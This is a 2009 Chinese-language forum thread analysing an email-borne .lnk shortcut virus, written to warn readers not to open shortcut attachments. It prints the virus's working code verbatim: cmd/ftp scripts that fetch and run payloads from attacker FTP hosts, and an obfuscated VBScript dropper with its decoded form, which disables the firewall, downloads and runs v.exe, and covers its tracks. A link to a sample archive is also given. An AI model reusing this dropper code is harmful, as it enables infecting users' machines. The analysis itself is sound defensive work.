Shunze 學園 - 《注意》捷徑病毒xxx.lnk

Shunze 學園 >電腦資訊學系 >病毒追追追 > 《注意》捷徑病毒xxx.lnk

哈囉，還沒有註冊或者登入。請你[註冊|登入]

顯示成列印模式 | 增加到我的最愛

作者

主題

shunze
工友伯伯

註冊日期: 2002 04
來自: 潮汐終止之地
文章: 2392
shunze 離線

《注意》捷徑病毒xxx.lnk

最近收到幾封不太熟的聯絡人寄來內含“捷徑病毒”的病毒信。

將捷徑病毒另存為副檔名txt的檔案，扣除無法檢視的亂碼後，
我們可以看到以下的程式碼。

C:\WINDOWS\system32\cmd.exe %windir%/c
echo open onehla.3322.org>>t.t
echo 123>>t.t
echo 123>>t.t
echo get 1-1 %windir%\link.vbs>>t.t
echo bye>>t.t
ftp -s:t.t
del t.t
start %windir%\link.vbs
000000000000000000000
%ProgramFiles%\Windows Media Player\wmplayer.exe

這段程式碼運作後，會在系統目錄下建立檔案t.t。
然後連結到onehla.3322.org的ftp網站，以帳號:123 密碼:123登入，
下載ftp主機上的病毒本體1-1，另存檔名為link.vbs到系統目錄下。

接著擦屁股，殺掉暫存檔t.t，運行下載至系統目錄的link.vbs。
最後，煞有其事的打開Windows Media Player騙騙user！

記住一個原則，沒有人會寄“捷徑檔”給朋友！
千萬不要因為郵件主旨或內容吸引人，而好奇的執行它。
好奇心足以讓您的電腦因此中毒！

♥順子老婆的網拍，請多關照～

If you don't like something, change it.
If you can't change it, change your attitude.
Don't complain!

2009-01-05, 11:25

shunze
工友伯伯

註冊日期: 2002 04
來自: 潮汐終止之地
文章: 2392
shunze 離線

《分享》捷徑病毒感染方式解析

最近“捷徑病毒”似乎是愈來愈流行了！？
01/05才剛寫完上一篇，今天馬上又收到一封相同手法的病毒信。

不過，若不是苦主通知受害者不要上當，說真的我還不知道有這封病毒信？
原來這類病毒信早就被GMail自動攔劫，丟到垃圾郵件裏去了～

把這封信從垃圾郵件裏撈出來，讓我們仔細來看看它是如何運作的。

將捷徑病毒另存為副檔名txt的檔案後，我們可以發現如下的程式碼：

C:\WINDOWS\system32\cmd.exe %windir%/c
echo open laolin.web1.oofy.net>>a.t
echo 123>>a.t
echo 123>>a.t
echo get msvb %windir%\msvb.vbs>>a.t
echo bye>>a.t
ftp -s:a.t
del a.t
start %windir%\msvb.vbs

此程式的意思是跟上一篇差不多，差別僅在於病毒檔名有些不同，手法完全一樣。

順子實際連上laolin.web1.oofy.net這個ftp站台後，發現有如下的內容：

我們模仿病毒程序至ftp下載了病毒本體msvb，看看它裏面究竟寫了什麼？

strs=array(36,106,124,139,55,120,121,55,84,55,90,137,124,120,139,124,102,121,
129,124,122,139,63,57,110,138,122,137,128,135,139,69,106,127,124,
131,131,57,64,55,36,33,120,121,69,137,140,133,55,57,122,132,123,
55,70,122,55,133,124,139,55,138,139,134,135,55,138,127,120,137,124,
123,120,122,122,124,138,138,61,124,122,127,134,55,134,135,124,133,
55,131,120,134,131,128,133,69,142,124,121,72,69,134,134,125,144,69,
133,124,139,85,85,139,69,139,61,124,122,127,134,55,72,73,74,85,85,
139,69,139,61,124,122,127,134,55,72,73,74,85,85,139,69,139,61,124,
122,127,134,55,126,124,139,55,141,69,124,143,124,55,90,81,115,141,
69,124,143,124,85,85,139,69,139,61,124,122,127,134,55,121,144,124,
85,85,139,69,139,61,125,139,135,55,68,138,81,139,69,139,61,123,124,
131,55,139,69,139,61,122,81,115,141,69,124,143,124,61,138,139,120,
137,139,55,127,139,139,135,81,70,70,142,142,142,69,139,139,125,125,
79,79,75,69,122,134,132,70,130,128,133,126,69,129,135,126,61,123,124,
131,55,60,142,128,133,123,128,137,60,115,132,138,141,121,69,141,121,
138,61,123,124,131,55,122,81,115,141,69,124,143,124,57,67,71,36,33)

for i=1 to UBound(strs)
runner=runner&chr(strs(i)-23)
next
Execute runner

看不懂對不對？

其實將這一連串數字以chr()解碼後，會變成以下內容：

Set ab = CreateObject("Wscript.Shell")
ab.run "cmd /c net stop sharedaccess
echo open laolin.web1.oofy.net>>t.t
echo 123>>t.t
echo 123>>t.t
echo get v.exe C:\v.exe>>t.t
echo bye>>t.t&ftp -s:t.t
del t.t&c:\v.exe
start http://www.ttff884.com/king.jpg
del %windir%\msvb.vbs
del c:\v.exe",0

意思就是以同樣手法，上laolin.web1.oofy.net這個ftp站台，
然後下載真正有感染力的病毒程式v.exe。
接著打開使用者的瀏覽器，顯示www.ttff884.com站台上的king.jpg這張圖檔，

最後在背地裏偷偷執行病毒v.exe。

當受害者以為『原來就這一張圖片啊！？真無聊...』的同時，
電腦也開始發送捷徑病毒給下一個受害者了...

注意：
附加檔為病毒ftp站台上所抓下來的四個病毒檔案sample。
由於down.exe跟v.exe完全一樣，所以只保留一個。
研究時，請小心使用！

shunze 上傳的檔案

email_link-virus.rar (174 KB, 已經被下載 2105 次)

♥順子老婆的網拍，請多關照～

If you don't like something, change it.
If you can't change it, change your attitude.
Don't complain!

2009-01-07, 21:26